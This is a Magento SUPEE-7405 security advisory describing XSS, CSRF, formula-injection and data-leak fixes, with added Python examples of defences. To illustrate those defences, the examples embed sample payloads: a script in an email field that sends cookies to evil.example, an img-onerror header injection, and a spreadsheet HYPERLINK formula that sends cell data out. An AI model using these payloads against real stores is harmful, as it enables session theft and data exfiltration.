New Security Update

Install critical updates for Magento 1.x and Magento 2.x versions

SUPEE-7405

February 23, 2016

Updated February 23, 2016

Updated versions of this release are now available. The updates add support for PHP 5.3 and address issues with upload file permissions, merging carts, and SOAP APIs experienced with the original release. They DO NOT address any new security issues.

RELEASE DETAILS

We highly recommend that all users either install the SUPEE-7405 v1.1 patch bundle, or upgrade to Magento Enterprise Edition 1.14.2.4 or Magento Community Edition 1.9.2.4.

You must install the SUPEE-7405 v1.0 patch before installing the SUPEE-7405 v1.1 patch bundle if you are running a version of Magento Enterprise Edition prior to 1.14.2.3 or Magento Community Edition prior to 1.9.2.3.

You do not need to install the SUPEE-7405 v1.0 patch if you are running Magento Enterprise Edition 1.14.2.3, Magento Community Edition 1.9.2.3, or have previously installed the SUPEE-7405 v1.0 patch on an earlier version of Magento Community Edition.

The SUPEE-7405 v1.1 patch bundle includes the following:

Cart Merge Patch (SUPEE-7978)

Carts with identical items now merge correctly. Previously, when a cart with one item was merged with another cart that contained the same item, Magento did not merge the cart totals correctly. The cart now includes only one item, and the total is correct.

SOAP API Patch (SUPEE-7822)

The Magento SOAP API now works as expected. Previously, after installing the SUPEE-7405 v1.0 patch, an API request would return a 500 error and Magento would log an exception.

PHP 5.3 Compatibility (SUPEE-7882)

The v1.0 patch was not compatible with PHP 5.3 on the earlier Magento versions that still supported it. Merchants affected by this issue were unable to view sales information in the Admin.

Upload File Permissions

The patch restores the less restrictive file permissions (0666 for files and 0777 for directories) that Magento used before SUPEE-7405 v1.0, because the stricter permissions introduced by the original patch prevented many merchants from viewing uploaded product images, depending on hosting provider configuration. Note that 0666 and 0777 are world-writable modes: treat them as a compatibility fallback rather than a recommendation, and tighten them again (for example, to group-writable) where your web server and PHP processes run under a shared group that allows it.

DOWNLOADING THE UPDATES

Patches and upgrades are available for the following Magento versions:

  • Enterprise Edition 1.9.0.0-1.14.2.3: SUPEE-7405 v1.1 or upgrade to Enterprise Edition 1.14.2.4

  • Community Edition 1.5.0.0-1.9.2.3: SUPEE-7405 v1.1 or upgrade to Community Edition 1.9.2.4

To download a patch or release, choose from the following options:

Partners:

Enterprise Edition 1.14.2.4

Partner Portal > Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Version 1.x Releases > Version 1.14.2.4

SUPEE-7405 v1.1

Partner Portal > Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Support and Security Patches > Security Patches > Security Patches – February 2016 

Enterprise Edition Merchants:

Enterprise Edition 1.14.2.4

My Account > Downloads Tab > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Version 1.x Releases > Version 1.14.2.4

SUPEE-7405 v1.1

My Account > Downloads Tab > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Support and Security Patches > Security Patches > Security Patches – February 2016
Community Edition Merchants:

Community Edition 1.9.2.4

Community Edition Download Page > Release Archive Tab

SUPEE-7405 v1.1

Community Edition Download Page > Release Archive Tab > Magento Community Edition Patches - 1.x Section
January 20, 2016

SUPEE-7405 is a bundle of patches for Magento 1.x that resolves several security-related issues. Details of the vulnerabilities addressed by this patch follow.

Stored XSS via email address - APPSEC-1213
Type: Cross-site Scripting (XSS) - Stored
CVSSv3 Severity: 9.3 (Critical)
Known Attacks: None
Description:

During customer registration on the storefront, a user can provide an email address that contains JavaScript code. Magento does not properly validate this email, and the code executes in the Admin context (in the administrator's browser) when the order is viewed in the backend. This JavaScript code can steal an administrator session or act on behalf of a store administrator.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Marc-Alexandre Montpas
Stored XSS in Order Comments - APPSEC-1239
Type: Cross-site Scripting (XSS) - Stored
CVSSv3 Severity: 9.3 (Critical)
Known Attacks: None
Description:

A user can append comments to an order using a specially crafted request that relies on the PayFlow Pro payment module. Magento does not filter the request properly, which can result in JavaScript code being saved to the database (see issue APPSEC-1240) and then executed in the administrator's browser when the administrator views the order. This attack can lead to a takeover of the administrator session or to actions being executed on behalf of the administrator.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Erik Wohllebe
Stored XSS in Order - APPSEC-1260
Type: Cross-site Scripting (XSS) - Stored
CVSSv3 Severity: 7.5 (High)
Known Attacks: None
Description:

In certain configurations, Magento uses the HTTP_X_FORWARDED_FOR header as the customer IP address and displays it without sanitization in the Admin Panel. An attacker can use this header to inject JavaScript code into Order View forms in the Admin Panel. The code is then executed when a user visits an Order View form, allowing takeover of an administrator session or allowing an unauthorized user to execute actions on behalf of an administrator. Note that we do not recommend using this header configuration setting.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Peter O'Callaghan
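The two admin-context stored XSS issues above (APPSEC-1213 via the registration email and APPSEC-1260 via X-Forwarded-For) share the same two fixes: strict validation of the value on the way in, and escaping of every attacker-influenced value at the point it is rendered into the Admin page. The following is an added Python illustration of both, not Magento code from the patch or the advisory; the sample email, the forged header and the trusted-proxy address 10.0.0.5 are constructed for the example.

```python
import html
import ipaddress
import re
from typing import Optional

# Constructed sample inputs (not taken from the advisory): a registration email
# carrying a script payload, and an X-Forwarded-For header a client forged before
# the trusted reverse proxy appended the real client address.
MALICIOUS_EMAIL = 'victim@example.com<script>new Image().src="//evil.example/?c="+document.cookie</script>'
FORGED_XFF = '<img src=x onerror=alert(1)>, 198.51.100.7'

# Strict local@domain shape; anything containing markup characters fails.
_EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+')


def is_valid_email(value: str) -> bool:
    """Input-side defence for APPSEC-1213: refuse addresses that are not plain local@domain."""
    return len(value) <= 254 and _EMAIL_RE.fullmatch(value) is not None


def escape_for_html(value: str) -> str:
    """Output-side defence: escape every untrusted value at the point it is rendered.
    This is what protects the admin even if a bad value already reached the database."""
    return html.escape(value, quote=True)


def render_order_row(email: str, ip: str) -> str:
    """Admin order-view fragment; both columns are attacker-influenced data."""
    return '<tr><td>%s</td><td>%s</td></tr>' % (escape_for_html(email), escape_for_html(ip))


# Hypothetical set of reverse proxies this deployment trusts (assumption for the example).
TRUSTED_PROXIES = {ipaddress.ip_address('10.0.0.5')}


def client_ip(remote_addr: str, xff_header: Optional[str]) -> str:
    """Defence for APPSEC-1260: honour X-Forwarded-For only when the TCP peer is a
    trusted proxy, take the entry that proxy appended (rightmost), and keep it only
    if it parses as an IP address. Otherwise use the socket address, which the
    client cannot forge."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        return str(peer)
    candidate = xff_header.split(',')[-1].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return str(peer)
```

Validation and escaping are independent layers: the email check stops the payload from being stored, while the escaping in render_order_row neutralizes anything that was stored before the check existed. For the forwarded-header case, parsing the value as an IP address leaves no room for markup at all, which is why the advisory's "do not use this setting" advice and this check agree.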
Guest order view protection code vulnerable to brute-force attack - APPSEC-1270
Type: Information Leakage
CVSSv3 Severity: 7.5 (High)
Known Attacks: None
Description:

The guest order view protection code can be guessed, which makes it possible to access guest order information for some orders. (This is due to how the code is generated and compared with stored values.) While the attack cannot target a specific order or allow a user to view all orders, it can be used to extract order information from the store.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Peter O'Callaghan
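The advisory attributes APPSEC-1270 to how the protection code is generated and compared. The following added Python example (not Magento's code; the four-digit "weak" scheme is an assumption used only to make the search space visible) shows the three properties a guest-access token needs: enough entropy that enumeration is infeasible, a constant-time comparison so timing does not leak partial matches, and a per-order attempt limit as a backstop.

```python
import hmac
import math
import secrets
from typing import Dict, Optional


def weak_protection_code() -> str:
    """Illustrative weak scheme (an assumption for this example, not Magento's code):
    four decimal digits give only 10,000 possibilities."""
    return '%04d' % secrets.randbelow(10_000)


def strong_protection_code() -> str:
    """128 bits from the OS CSPRNG, URL-safe so it can sit in an order-view link."""
    return secrets.token_urlsafe(16)


def search_space_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random code, for sizing an attacker's guess budget."""
    return length * math.log2(alphabet_size)


def verify_code(stored: str, supplied: str) -> bool:
    """Constant-time comparison: response timing must not leak how many
    leading characters matched."""
    return hmac.compare_digest(stored.encode(), supplied.encode())


def brute_force_weak(stored: str) -> Optional[int]:
    """Attacker's view: with no rate limit, the weak code falls in at most 10,000 tries."""
    for guess in range(10_000):
        if verify_code(stored, '%04d' % guess):
            return guess
    return None


class GuestOrderGate:
    """Server-side guard: lock an order's guest link after too many wrong codes,
    so the search space cannot be walked even where a code is short."""

    def __init__(self, max_attempts: int = 5) -> None:
        self.max_attempts = max_attempts
        self.failures: Dict[str, int] = {}

    def view(self, order_id: str, stored_code: str, supplied_code: str) -> str:
        if self.failures.get(order_id, 0) >= self.max_attempts:
            return 'locked'
        if verify_code(stored_code, supplied_code):
            return 'ok'
        self.failures[order_id] = self.failures.get(order_id, 0) + 1
        return 'denied'
```

A 22-character URL-safe token carries about 132 bits, so enumeration is not a realistic attack even without the gate; the gate matters for deployments that cannot regenerate codes for existing orders.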
Information Disclosure in RSS feed - APPSEC-1171
Type: Information Leakage
CVSSv3 Severity: 7.5 (High)
Known Attacks: None
Description:

Order comments and other order-related information can be downloaded by passing special parameters to the RSS feed request. Depending on the contents of the order comments, this information can disclose private data or be used to access a customer account or other customer information.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Egidio Romano
CSRF token not validated on backend login page - APPSEC-1206
Type: Cross-site Request Forgery (CSRF)
CVSSv3 Severity: 7.4 (High)
Known Attacks: None
Description:

The lack of form protection on the Admin Login page enables request forgery attacks. These attacks require the administrator to be tricked into clicking a link, by phishing or by link hiding.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Alistair Stead
Malicious files can be uploaded via backend - APPSEC-1306
Type: Insufficient Protection
CVSSv3 Severity: 6.5 (Medium)
Known Attacks: None
Description:

An administrator can upload a file containing executable code to the server as a logo file by renaming the file to a supported image file extension. The issue is not exploitable on its own unless an administrator account with access to configuration is compromised. However, site audits may flag this issue, and it can cause security audits (such as PCI) to fail.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Magento Merchant
CSRF leading to execution of admin actions after login - APPSEC-1179
Type: Cross-site Request Forgery (CSRF)
CVSSv3 Severity: 6.1 (Medium)
Known Attacks: None
Description:

A user can execute a CSRF attack on URLs that result in a server-side action (such as deleting customers) when the administrator is logged out. This action is not executed until the administrator logs in after the attack. The attack relies upon phishing, that is, it requires the administrator to click on a malicious link, and requires the administrator to log in after the attack.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Clement Mezino
Excel Formula Injection via CSV/XML export - APPSEC-1110
Type: Formula Injection
CVSSv3 Severity: 6.1 (Medium)
Known Attacks: None
Description:

We have found an additional attack path not covered by issue APPSEC-978, which was resolved in patch https://magento.com/security/patches/supee-5994 for Magento 1.x.

A user can provide input that executes as a formula when exported and opened in a spreadsheet such as Microsoft Excel. This formula could modify data, export personal data to another site, or cause remote code execution. The spreadsheet typically displays a warning message, which the user must dismiss, for the attack to succeed.

Note: The code that protects against this attack modifies the exported file by prepending a space to some fields. As a result, this fix can lead to data inconsistency. (Data inconsistency might occur when fields, such as product name or description, start with =, + or -.)

If this fix causes problems with your data processing, you can disable it. Be aware, however, that this protection is enabled by default, and disabling it increases security risk.

To disable this fix, log in to the Admin Panel, then use the System tab to navigate to the Export CSV fields.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Nikhil Srivastava
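The mitigation the advisory describes for APPSEC-1110 (prefixing a leading formula character with a space) and its side effect on legitimate data are easiest to see on a concrete export. The following is an added Python example, not Magento's export code; the sample rows are constructed, and the '@' trigger is an addition beyond the =, + and - the advisory lists, included because Excel also treats it as a formula prefix.

```python
import csv
import io
from typing import Iterable, List

# Characters that make a spreadsheet treat a cell as a formula. The advisory names
# =, + and -; '@' is added here (an assumption beyond the page) because Excel also
# evaluates it as a formula prefix.
FORMULA_TRIGGERS = ('=', '+', '-', '@')

# Constructed sample export rows (not from the advisory): an innocent product, one
# whose name was set to a hyperlink formula that exfiltrates a neighbouring cell,
# and one whose legitimate name happens to start with '-'.
SAMPLE_ROWS = [
    ['sku', 'name', 'qty'],
    ['A-1', 'Blue mug', '12'],
    ['A-2', '=HYPERLINK("http://evil.example/?d="&B2,"Click for details")', '3'],
    ['A-3', '-5% promo tee', '40'],
]


def is_formula_like(field: str) -> bool:
    """True when a spreadsheet would interpret the cell as a formula."""
    return field[:1] in FORMULA_TRIGGERS


def neutralize(field: str) -> str:
    """The mitigation the advisory describes: prefix a leading trigger character
    with a space so the spreadsheet reads the cell as text. The side effect the
    advisory warns about is visible on '-5% promo tee', which changes too."""
    return ' ' + field if is_formula_like(field) else field


def export_csv(rows: Iterable[List[str]], protect: bool = True) -> str:
    """Write rows as CSV; protect=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator='\n')
    for row in rows:
        writer.writerow([neutralize(c) if protect else c for c in row])
    return buf.getvalue()
```

Because the neutralized value is what lands in the file, any downstream import that compares product names byte for byte will see the difference the advisory calls data inconsistency; strip the leading space on import, or switch the protection off only for exports that never reach a spreadsheet.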
XSS in Product Custom Options - APPSEC-1267
Type: Cross-site Scripting (XSS) - Stored
CVSSv3 Severity: 5.9 (Medium)
Known Attacks: None
Description:

When a product has a file-upload custom option, a user can upload a file whose name contains JavaScript code. The code can execute in the Admin Panel context when an administrator edits the quote that contains the product, allowing takeover of an administrator session or allowing an unauthorized user to execute malicious actions on behalf of an administrator.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Erik Wohllebe
Editing or Deleting Reviews without permission - APPSEC-1268
Type: Insufficient Data Protection
CVSSv3 Severity: 5.4 (Medium)
Known Attacks: None
Description:

Insufficient verification of request parameters allows any user to delete or edit product reviews. Edited reviews are returned to a pending state. This attack does not depend on the setting that allows guest users to post reviews. As a result, a malicious user could use the store for spamming purposes or delete all reviews from the store.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Peter O'Callaghan
Disruption of email delivery - APPSEC-1177
Type: Denial of Service
CVSSv3 Severity: 5.3 (Medium)
Known Attacks: None
Description:

An error in the email address associated with a store newsletter can prevent newsletter email from being sent. This error can be used as a Denial of Service attack. In some cases, accented characters in the address are enough to trigger the error.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Benjamin Lessani
CAPTCHA Bypass - APPSEC-1283
Type: Brute Force (Generic) / Insufficient Anti-automation
CVSSv3 Severity: 5.3 (Medium)
Known Attacks: None
Description:

A user can bypass CAPTCHA validation on the Magento frontend, which enables unrestricted password guessing attempts. Even with CAPTCHA protection enabled, this increases the risk of spam or password guessing attacks on customer accounts.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Erik Wohllebe
Admin path disclosure via Authorize.net - APPSEC-1208
Type: Information Disclosure (Internal)
CVSSv3 Severity: 5.3 (Medium)
Known Attacks: None
Description:

A user can identify the URL for the Magento Admin Panel by calling Authorize.net payment module URLs. While exposure of the Admin path isn't a direct security issue, it makes it easier to carry out other malicious attacks, including password guessing or phishing.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Erik Wohllebe
XSS Payload in website's translation table - APPSEC-1214
Type: Cross-site Scripting (XSS) - Stored
CVSSv3 Severity: 4.7 (Medium)
Known Attacks: None
Description:

When inline translation is enabled on the frontend, a user can inject a translation string that contains JavaScript code. This JavaScript code is later included and executed on the affected pages for all users, which can lead to session takeover or information disclosure. This is a low-risk issue because inline translation should never be enabled without restriction on a production site.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Marc-Alexandre Montpas
CSRF Delete Items from Cart - APPSEC-1212
Type: Cross-site Request Forgery (CSRF)
CVSSv3 Severity: 4.3 (Medium)
Known Attacks: None
Description:

Magento does not validate the form key when deleting items from the shopping cart using a GET request. As a result, an attacker could use phishing emails or other malicious techniques to trick a customer into deleting items from their cart.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Vishnu Vardhan Reddy (Vishnu dfx)
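Three of the issues in this bundle are request forgery with slightly different shapes: a login form without a form key (APPSEC-1206), a forged state change issued while the administrator is logged out and executed after login (APPSEC-1179), and a state change reachable by GET (APPSEC-1212). One session-bound form-key design covers all three, shown below as an added Python example that is not Magento's form-key implementation; the admin credential and the customer id are constructed for the example.

```python
import hmac
import secrets
from typing import Optional

# Constructed admin credential for the example (assumption, not from the advisory).
ADMIN_USER, ADMIN_PASS = 'admin', 'correct horse battery staple'


class Session:
    """Server-side session: id, authenticated user, and a per-session form key."""

    def __init__(self) -> None:
        self.id = secrets.token_hex(16)
        self.user: Optional[str] = None
        self.form_key = secrets.token_urlsafe(16)

    def regenerate(self) -> None:
        """On privilege change (login) rotate BOTH the session id and the form key,
        so anything captured or queued while logged out is useless afterwards."""
        self.id = secrets.token_hex(16)
        self.form_key = secrets.token_urlsafe(16)


def check_form_key(session: Session, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted key against the session's key."""
    return submitted is not None and hmac.compare_digest(session.form_key, submitted)


def handle_login(session: Session, submitted_key: Optional[str], user: str, password: str) -> str:
    # APPSEC-1206: the login form itself carries a form key, so a cross-site page
    # cannot drive the victim's browser through the login form.
    if not check_form_key(session, submitted_key):
        return 'csrf_rejected'
    if (user, password) != (ADMIN_USER, ADMIN_PASS):
        return 'bad_credentials'
    session.regenerate()
    session.user = user
    return 'logged_in'


def handle_delete_customer(session: Session, method: str, submitted_key: Optional[str], customer_id: int) -> str:
    # APPSEC-1212: state changes only via POST, never via a link a victim can be sent.
    if method != 'POST':
        return 'method_rejected'
    # APPSEC-1179: an unauthenticated state change is rejected outright, never
    # queued to run after login ...
    if session.user is None:
        return 'login_required'
    # ... and a key issued before login no longer matches after regenerate().
    if not check_form_key(session, submitted_key):
        return 'csrf_rejected'
    return 'deleted %d' % customer_id


def pre_login_forgery_replayed(session: Session) -> str:
    """Walk the APPSEC-1179 scenario: a forged delete arrives while the admin is
    logged out (the only key it could carry is the pre-login one), the admin then
    logs in, and the same request is replayed."""
    forged = ('POST', session.form_key, 42)
    handle_delete_customer(session, *forged)      # rejected: not logged in
    handle_login(session, session.form_key, ADMIN_USER, ADMIN_PASS)
    return handle_delete_customer(session, *forged)
```

The order of checks matters: the method check comes first because a GET can be triggered by an image tag without any user interaction, and the key check comes last because a key is only meaningful once the session it belongs to is authenticated.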
XSS via custom options - APPSEC-1276
Type: Cross-site Scripting (XSS) - Stored
CVSSv3 Severity: 3.8 (Low)
Known Attacks: None
Description:

A user can insert JavaScript into a custom option title when creating it on the server side. The code can then be executed on the Magento frontend. Although this vulnerability does not directly enable a malicious attack on a store, such unvalidated input should not be allowed in a Magento installation.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Allan MacGregor
Risky serialized string filtering - APPSEC-1204
Type: Unsafe Code
CVSSv3 Severity: 0 (Low)
Known Attacks: None
Description:

Magento includes code that sanitizes serialized strings and raises an error when an object is included. The check is incomplete: specially crafted serialized objects may still be unserialized by Magento, which can lead to malicious code execution. While the issue is not exploitable on its own, a user can combine it with other attacks to achieve remote code execution.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Taoguang Chen
Reflected XSS in backend coupon entry - APPSEC-1305
Type: Cross-site Scripting (XSS) - Reflected
CVSSv3 Severity: 0 (Low)
Known Attacks: None
Description:

When working with an order that contains items in the shopping cart, an administrator can enter JavaScript into the coupon code field of the Manage Shopping Cart page. This JavaScript can be executed later. While this is not an exploitable security issue, site audits may flag it, and it can cause security audits (such as PCI) to fail.

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In: CE 1.9.2.3, EE 1.14.2.3
Reporter: Magento Merchant
Injected code can be stored in database - APPSEC-1240
Type: Improper Input Handling
CVSSv3 Severity: 0 (Low)
Known Attacks: None
Description:

JavaScript code that is passed using the Payflow Pro payment module is not sanitized but is saved to the database. This issue by itself is not a security risk. (This issue is related to APPSEC-1239.)

Product(s) Affected: Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In: CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter: Internal

Additionally, the patch resolves issues identified by Magento merchants after installing previous security patches:

  • URLs are redirected to 404 page or installer

  • Caching issues when running PHP 5.3.3 without PHP-FPM

  • Block permissions code issue

  • Password forgotten link redirects to login page

  • Administrator password can be reused (Enterprise Edition only)

Please refer to Security Best Practices for additional information on how to secure your site.

To download the patch or release, choose from the following options:

Partners:

  • Enterprise Edition 1.14.2.3: Go to the Partner Portal, select Technical Resources and then select Download from the Enterprise Edition panel. Next, navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release and look for the folder titled "Version 1.14.2.3".

  • SUPEE-7405: Go to the Partner Portal, select Technical Resources and then select Download from the Enterprise Edition panel. Next, navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release > Support and Security Patches and look for the folder titled "Security Patches - January 2016".

Enterprise Edition Merchants:

  • Enterprise Edition 1.14.2.3: Go to My Account, select the Downloads tab, and then navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release and look for the folder titled "Version 1.14.2.3".

  • SUPEE-7405: Go to My Account, select the Downloads tab, and then navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release > Support Patches / Security Patches and look for the folder titled "Security Patches - January 2016".

Community Edition Merchants:

  • Community Edition 1.9.2.3: Go to download page, select the Release Archive tab.

  • SUPEE-7405: Patches for earlier versions of Community Edition can be found on the Community Edition download page. Select the Release Archive tab and look for SUPEE-7405 in the Magento Community Edition Patches - 1.x section.

Be sure to implement and test the patch in a development environment first to confirm that it works as expected before deploying it to a production site. Information about installing patches for Magento Enterprise Edition and Magento Community Edition is available online.